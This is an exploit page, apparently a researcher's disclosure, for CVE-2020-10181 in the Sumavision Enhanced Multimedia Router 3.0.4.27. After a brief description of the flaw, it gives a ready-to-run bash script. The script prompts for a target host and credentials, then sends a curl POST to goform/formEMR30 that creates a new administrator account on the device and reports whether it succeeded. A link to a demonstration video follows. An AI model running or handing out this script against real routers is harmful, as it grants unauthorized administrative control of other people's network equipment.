kd❯ g

fffff803'00000000 EB FE jmp short loc_HackinG

~ ./priv

        						Sumavision EMR3.0 - CVE-2020-10181
        					

                      Enhanced Multimedia Router version 3.0.4.27 suffers from a cross site request forgery vulnerability.
                      
                      [Description]

                      goform/formEMR30 in Sumavision Enhanced Multimedia Router (EMR) 3.0.4.27 allows creation of arbitrary users with elevated privileges (administrator) on a device, as demonstrated by a setString=new_user<*1*>administrator<*1*>123456 request.
                      
                      [Code]

                      # Miguel Mendez Z.
# @s1kr10s

echo ""
read -p "Set Hostname: " host
read -p "Set username: " user
echo "(The password should be between 6 and 32 in length)"
read -p "Set password: " pass
echo
echo "[+] creating user..."
sleep 2
postdata=$(curl -X POST -d "type=11&cmd=3&language=0&slotNo=255&setString=$user<*1*>administrator<*1*>$pass" "http://$host/goform/formEMR30" -s | grep -i "0")
if echo "$postdata" | grep -q "0</html>"; then
  echo "[+] http://$host/frame_en.asp"
  echo "[+] created access($user - $pass)"
else
  echo "[-] user not created"
fi
                      
[Demo Video]

https://www.youtube.com/watch?v=Ufcj4D9eA5o